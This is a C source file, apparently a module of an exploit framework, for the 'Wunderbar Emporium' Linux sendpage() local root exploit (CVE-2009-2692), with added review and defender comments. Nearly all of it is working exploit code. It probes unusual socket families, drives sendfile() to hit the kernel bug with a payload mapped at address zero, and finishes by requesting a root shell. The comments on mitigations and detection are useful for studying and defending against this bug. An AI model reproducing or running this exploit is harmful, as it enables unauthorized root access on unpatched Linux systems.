enlightenment/exp_wunderbar.c


/* wunderbar */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sendfile.h>
#include "exp_framework.h"
/* Shared framework state. Set once by get_exploit_state_ptr() and polled by
 * trigger() (the got_ring0 field). The struct layout lives in exp_framework.h,
 * which is not visible here. */
struct exploit_state *exp_state;
/* Sentinel in domains[][0] that terminates the probe table (see trigger()).
 * NOTE(review): unparenthesized negative macro; harmless in the one `!=`
 * comparison that uses it, but fragile if ever used in arithmetic. */
#define DOMAINS_STOP -1
/* NOTE(review): not referenced anywhere in this file; presumably a leftover
 * from another module of the same framework -- confirm before relying on it. */
#define VIDEO_SIZE 4171600
/* Fallback constants for toolchains whose headers do not provide them. */
#ifndef IPPROTO_SCTP
#define IPPROTO_SCTP 132
#endif
#ifndef PX_PROTO_OL2TP
#define PX_PROTO_OL2TP 1
#endif
#ifndef PF_IUCV
#define PF_IUCV 32
#endif
/* Probe table of {family, type, protocol} triples. trigger() walks it in
 * order and keeps the first entry for which socket() succeeds, so the order
 * here is the preference order. The table must end with the DOMAINS_STOP row.
 * Defender note: which rows succeed on a given host depends on the protocol
 * modules loaded there; blacklisting unused socket families (modprobe.d) and
 * the upstream fix for CVE-2009-2692 both remove entries from play. */
const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 },
{PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 },
{PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 },
{PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 },
{PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP },
{PF_PPPOX, SOCK_DGRAM, 0 },
{PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP },
{DOMAINS_STOP, 0, 0 }
};
/* Human-readable description and CVE id reported by the framework.
 * NOTE(review): string literals bound to non-const `char *`; writing through
 * either pointer is UB. `const char *` would be correct, but the declared type
 * is presumably part of the framework's module interface -- check before changing. */
char *desc = "Wunderbar Emporium: Linux 2.X sendpage() local root";
char *cve = "CVE-2009-2692";
/*
 * Framework hook: report where the payload will execute.
 * @buf: payload buffer handed over by the framework; not inspected here.
 * Returns STRAIGHT_UP_EXECUTION_AT_NULL (declared in exp_framework.h), i.e.
 * the framework must map page zero -- which is exactly what a nonzero
 * vm.mmap_min_addr forbids on hardened kernels.
 */
int prepare(unsigned char *buf)
{
    (void)buf; /* unused: the mode does not depend on the buffer contents */
    const int mode = STRAIGHT_UP_EXECUTION_AT_NULL;
    return mode;
}
/* Tells the framework that the payload must be reachable at address 0
 * (consistent with STRAIGHT_UP_EXECUTION_AT_NULL returned by prepare()).
 * Defender note: a nonzero vm.mmap_min_addr makes that mapping fail, which
 * is the standard mitigation for this class of NULL-dereference bugs. */
int requires_null_page = 1;
/*
 * Framework hook: remember the shared state pointer for trigger().
 * @ptr: framework-owned state; only the pointer is stored, nothing is copied,
 *       so the framework must keep it alive for as long as trigger() runs.
 * Always returns 0.
 */
int get_exploit_state_ptr(struct exploit_state *ptr)
{
    struct exploit_state **slot = &exp_state;
    *slot = ptr;
    return 0;
}
/*
 * Drive the sendfile() -> sock_sendpage() path on a socket from domains[]
 * repeatedly until the framework reports ring0 (exp_state->got_ring0 != 0).
 *
 * Returns 1 once got_ring0 becomes nonzero, 0 if creating the temp file or
 * opening a socket fails (a message is printed to stdout first).
 *
 * NOTE(review): nothing inside this loop sets got_ring0; presumably the
 * framework's payload does once the kernel executes it -- confirm in
 * exp_framework.h.
 * NOTE(review): `in` and `out` are never closed, so every iteration that
 * does not succeed leaks two descriptors, and the "unable to find a
 * vulnerable domain" path leaks `in` as well. The return values of
 * ftruncate() and sendfile() are not checked either.
 * Defender note: the observable footprint is a burst of socket() calls over
 * unusual address families followed by sendfile() from an unlinked
 * /tmp/sendfile.* file; auditing those syscalls is one way to detect it.
 */
int trigger(void)
{
    while (exp_state->got_ring0 == 0) {
        char template[] = "/tmp/sendfile.XXXXXX";
        int d;
        int in, out;
        // Setup source descriptor: a fresh temp file, unlinked right away so
        // it leaves no name on disk but stays open through `in`.
        if ((in = mkstemp(template)) < 0) {
            // %m is a glibc extension that expands to strerror(errno).
            fprintf(stdout, "failed to open input descriptor, %m\n");
            return 0;
        }
        unlink(template);
        // Find a vulnerable domain: the first table entry whose socket()
        // succeeds. If the table is exhausted, `out` holds the last failed
        // result (-1), which the check below relies on.
        for (d = 0; domains[d][0] != DOMAINS_STOP; d++) {
            if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0)
                break;
        }
        if (out < 0) {
            fprintf(stdout, "unable to find a vulnerable domain, sorry\n");
            return 0;
        }
        // Truncate input file to some large value -- in fact exactly one
        // page (getpagesize()), matching the count passed to sendfile().
        ftruncate(in, getpagesize());
        // sendfile() to trigger the bug. Result is ignored; the loop condition
        // is the only success signal.
        sendfile(out, in, NULL, getpagesize());
    }
    return 1;
}
/*
 * Framework hook run after trigger() returns success; asks the driver to
 * perform the RUN_ROOTSHELL action (declared in exp_framework.h).
 */
int post(void)
{
    const int action = RUN_ROOTSHELL;
    return action;
}